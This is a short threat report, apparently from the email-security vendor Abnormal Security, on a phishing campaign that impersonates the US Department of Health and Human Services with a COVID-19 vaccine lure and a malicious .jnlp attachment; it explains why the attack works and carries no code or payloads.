COVID-19 Vaccine Tracker - Abnormal Security

COVID-19 Vaccine Tracker

In this attack, attackers impersonate the US Department of Health and Human Services in order to install malware on employees’ devices.

Quick Summary of Attack Target

Platform: Office 365
Email Security Bypassed: Ironport
Mailboxes: 50,000 to 70,000
Payload: Java Network Launch Protocol (.jnlp) Attachment
Technique: Impersonation

What was the attack?

Setup: The COVID-19 pandemic continues to cause widespread duress meaning any news of a vaccine is likely to pique the interest of recipients.

Email Attack: This attacker has altered their display name to appear as ‘health & human services’ and includes U.S. Department of Health & Human Services|HHS] [sic] in their signature in order to appear as a trustworthy source. This attack targets all employees at an organization; the email claims that the attached file contains information on vaccines in trial and where to receive vaccines nearby.

Payload: This attack’s payload is in the attachment of the email. If the recipient downloads and runs the file (.jnlp – Java Network Launching Protocol format) they are at risk of installing malware.

Result: If the recipients fall for this attack, they are at risk of losing control of their device as well as allowing attackers to access sensitive personal and organizational information.

Why is this attack effective?

Relevance: As the world continues to tackle COVID-19, vaccines are touted as the ‘cure-all’ for the pandemic. As a result, this email attack preys on individuals’ concerns and inherent curiosity, making it more likely that they will engage with the attack.

Impersonation: The attacker impersonates the US Department of Health and Human Services. Employees are more likely to engage and download an attachment from a ‘trustworthy, known’ source.

Undetected by Antivirus: The attached .jnlp file is a vehicle for the malware attack. These types of files are able to launch Java programs remotely and then install malware on the victim’s device. When the file is run through VirusTotal, it returns as safe – these types of attacks are especially dangerous since they can bypass antivirus software.

Related content